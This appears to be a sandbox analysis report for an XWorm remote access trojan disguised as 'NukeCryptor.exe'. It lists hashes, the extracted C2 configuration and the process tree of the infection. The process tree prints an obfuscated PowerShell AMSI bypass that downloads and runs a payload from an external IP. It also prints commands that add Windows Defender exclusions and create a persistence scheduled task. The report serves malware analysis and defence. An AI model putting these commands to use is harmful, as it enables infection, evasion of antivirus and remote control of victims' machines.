Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

7

NukeCrypte...or.exe

windows7-x64

7

NukeCrypte...or.exe

windows10-2004-x64

7

NukeCrypte...I2.dll

windows7-x64

1

NukeCrypte...I2.dll

windows10-2004-x64

1

NukeCrypte...or.exe

windows7-x64

7

NukeCrypte...or.exe

windows10-2004-x64

10

NukeCrypte...li.dll

windows7-x64

7

NukeCrypte...li.dll

windows10-2004-x64

10

NukeCrypter/dnlib.dll

windows7-x64

1

NukeCrypter/dnlib.dll

windows10-2004-x64

1

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/03/2025, 19:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NukeCrypter/NukeCryptor.exe

  • Size

    519KB

  • MD5

    5897585e89a0e475202fd43bebb8b5ec

  • SHA1

    d3b45d759ee686d142849560e7d9e55e604cd4f7

  • SHA256

    fa3d58def6d373cfadebc1fa095731594c0c281a4d4119278d88087597fbaded

  • SHA512

    eab6e541a3c427adbc2fef42f203be247e8617cb76a51e8705cf547941fd1590f383ad48bf8d9b21d3df2bf33bebe61e6d86ac010aa54bffb42edb237952ea63

  • SSDEEP

    12288:KX9eknz7sMClkSWOx08pHSsiI7nTdYDJgsIrXtG4an2aHzI+Nan11aQIYP:KXYOClkg7SsiuTkJgl84XmI+0n1UHY

Score
10/10
xwormexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.137.201.27:2010

Mutex

NJSnJLx9hqfSdYjB

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    msedge.exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\NukeCrypter\NukeCryptor.exe
    "C:\Users\Admin\AppData\Local\Temp\NukeCrypter\NukeCryptor.exe"
    1⤵
    • Enumerates system info in registry
    • Suspicious use of WriteProcessMemory
    PID:2560
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\my_script.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1624
      • C:\ProgramData\Powermode.exe
        Powermode.exe -w hidden -ComMand $m1='A';$m3='i';$m2='ms';$m=$m1+$m2+$m3;$a1='am';$a2='si';$a=$a1+$a2+'InitFailed';$b1='No';$b2='nPu';$b3='bli';$b4='c,St';$b5='at';$b6='ic';$b=$b1+$b2+$b3+$b4+$b5+$b6;$ex=$null;$aaa1=[Ref].Assembly.GetType('System.Management.Automation.'+$m+'Utils').GetField($a,$b);$aaa1.SetValue($ex,$true);$XZLqW6au='http://45.137.201.27:30054/msedge.exe';$output=[System.IO.Path]::Combine($env:APPDATA,'msedge.exe');[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri $XZLqW6au -OutFile $output;Start-Process -FilePath $output;exit
        3⤵
        • Downloads MZ/PE file
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Users\Admin\AppData\Roaming\msedge.exe
          "C:\Users\Admin\AppData\Roaming\msedge.exe"
          4⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2728
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3328
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4516
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1980
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2956
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4708
  • C:\Users\Admin\AppData\Local\msedge.exe
    C:\Users\Admin\AppData\Local\msedge.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:116
  • C:\Users\Admin\AppData\Local\msedge.exe
    C:\Users\Admin\AppData\Local\msedge.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:4596

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Powermode.exe
    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

    Download Submit

  • C:\ProgramData\my_script.bat
    Filesize

    729B

    MD5

    092cabe7fe4773b78ff62f414633572f

    SHA1

    c9f77f261d45e394086f7bb23eb91b80b8d0b318

    SHA256

    85d5ee43057001a08fa00e02a4aaf7d84a2d4407f662fa9c22b16b22a9d0738b

    SHA512

    e5d1b866e5a50243f953b67f191c4185aecdc828e5641cae6f78486f71f337f3efedbcb6051586b886a3c321db6fb17f9fe276cbc9954e0abb41e0813589a022

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log
    Filesize

    654B

    MD5

    2ff39f6c7249774be85fd60a8f9a245e

    SHA1

    684ff36b31aedc1e587c8496c02722c6698c1c4e

    SHA256

    e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

    SHA512

    1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    d85ba6ff808d9e5444a4b369f5bc2730

    SHA1

    31aa9d96590fff6981b315e0b391b575e4c0804a

    SHA256

    84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

    SHA512

    8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    8d80c45e0e047b75073a3d1c2710c68f

    SHA1

    babc73cf30327b36d184239a2747ec94d48929f4

    SHA256

    6859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64

    SHA512

    5da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    a90d370b656f3927f00f99fcb32180fb

    SHA1

    8e37d43979a71a1c7e8a74907e58dd79a2d490a0

    SHA256

    c8b6998e0371f7f9edcdbf674db31aab7665dad04c31cd4df5b3e4477b94f359

    SHA512

    dd90e4e4086acafbf02e89110c3ddf96a1e5646492349548f9a11aa32475d393c9a4a97df938d3effbc0055a08104b5d11a353f9596f692edd6860a67942bc38

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    04114c0529b116bf66d764ff6a5a8fe3

    SHA1

    0caeff17d1b2190f76c9bf539105f6c40c92bd14

    SHA256

    fd7092b4e273314186bad6ce71aa4cd69450736b6ec6cc746868997ff82a7532

    SHA512

    6a718c330824346606ef24f71cca6be0bfafc626b1d2b060b36e919ab07f3d6a345f56cace8a5a84ffbe2183976eb197842c9fd2f3e3b8c8dd307057d59d6f26

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    944B

    MD5

    10890cda4b6eab618e926c4118ab0647

    SHA1

    1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

    SHA256

    00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

    SHA512

    a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_exwxzhoy.qkp.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\msedge.exe
    Filesize

    165KB

    MD5

    22a01fdc6d06f445af5de9759799225f

    SHA1

    1dde5be9d7c8a7ae68332c92a6e1263f24705f7c

    SHA256

    682acd04365f06fd83daa81b7bbd71665a60e729d6d4ecc3693eb486b8d4a13f

    SHA512

    e602f9d32b78c8d317698337ea2eb02b6bbf72cae13d3a5c3e3cee39c2445a8c2d85514eb7c741125364fee2f83582ce6a41154128a6c88c257cb5e41eb8f2d6

    Download Submit

  • memory/2560-3-0x00007FFA5F9B0000-0x00007FFA60471000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2560-88-0x00007FFA5F9B0000-0x00007FFA60471000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2560-1-0x0000000000DA0000-0x0000000000E26000-memory.dmp

    Filesize

    536KB

    Download

  • memory/2560-94-0x0000000067740000-0x000000006838B000-memory.dmp

    Filesize

    12.3MB

    Download

  • memory/2560-5-0x00007FFA5F9B0000-0x00007FFA60471000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2560-2-0x000000001BEF0000-0x000000001C104000-memory.dmp

    Filesize

    2.1MB

    Download

  • memory/2560-0-0x00007FFA5F9B3000-0x00007FFA5F9B5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2560-93-0x00007FFA5F9B0000-0x00007FFA60471000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2560-76-0x00007FFA5F9B3000-0x00007FFA5F9B5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/2560-4-0x00007FFA5F9B0000-0x00007FFA60471000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2728-104-0x000000001AD70000-0x000000001AD7C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/2728-39-0x0000000000140000-0x000000000016E000-memory.dmp

    Filesize

    184KB

    Download

  • memory/2788-40-0x00007FFA5F9B0000-0x00007FFA60471000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2788-13-0x000001B2A0DF0000-0x000001B2A0E12000-memory.dmp

    Filesize

    136KB

    Download

  • memory/2788-24-0x00007FFA5F9B0000-0x00007FFA60471000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2788-23-0x00007FFA5F9B0000-0x00007FFA60471000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/2788-25-0x00007FFA5F9B0000-0x00007FFA60471000-memory.dmp

    Filesize

    10.8MB

    Download